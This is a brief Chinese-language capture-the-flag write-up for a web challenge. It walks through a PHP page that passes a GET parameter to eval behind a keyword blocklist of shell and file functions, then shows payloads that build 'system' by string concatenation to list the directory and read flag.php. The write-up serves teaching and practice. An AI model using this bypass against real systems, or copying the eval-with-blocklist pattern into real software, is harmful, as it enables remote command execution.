web-文件包含1
这次呢是做下web中代码审计的,比较简单。下面是要审计代码。
<?php show_source(__FILE__); error_reporting(0); $disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir", "exec","proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"]; $disable_fun = array_merge($disable_fun, get_defined_functions()['internal']); foreach($disable_fun as $i){ if(stristr($_GET[shell], $i)!==false){ die('ctf'); } } eval($_GET[shell]);
按装顺序分析代码。
<?php //打印文件内容 show_source(__FILE__); //关闭报错 error_reporting(0);
//定义一个列表,然后列表里面存放着文件包含时的利用函数 $disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir", "exec","proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"]; //array_merge()将一个或多个数组的单元合并起来,一个数组中的值附加在前一个数组的后面,get_defined_functions()列出所有函数返回一个二维数组
$disable_fun = array_merge($disable_fun, get_defined_functions()['internal']);
//foreach()遍历数组
foreach($disable_fun as $i){
//stristr()函数搜索字符串在另一字符串中的第一次出现。且不区分大小
if(stristr($_GET[shell], $i)!==false){
die('ctf'); } }
//回显shell的内容 eval($_GET[shell]);
--------------------------------------------------吃饭---------------------------继续--------------------
初次构造语句:
$a='sys'.'tem';$a("ls");
得到目录信息
dhudndrgrhs.php flag.php index.php
继续构造,读取flag.php内容,这需要提示下这里是没有回显的需要查看源文件才可以。
$a='syst'.'em';$a("cat flag.php");
查看源码后在最下面找到flag。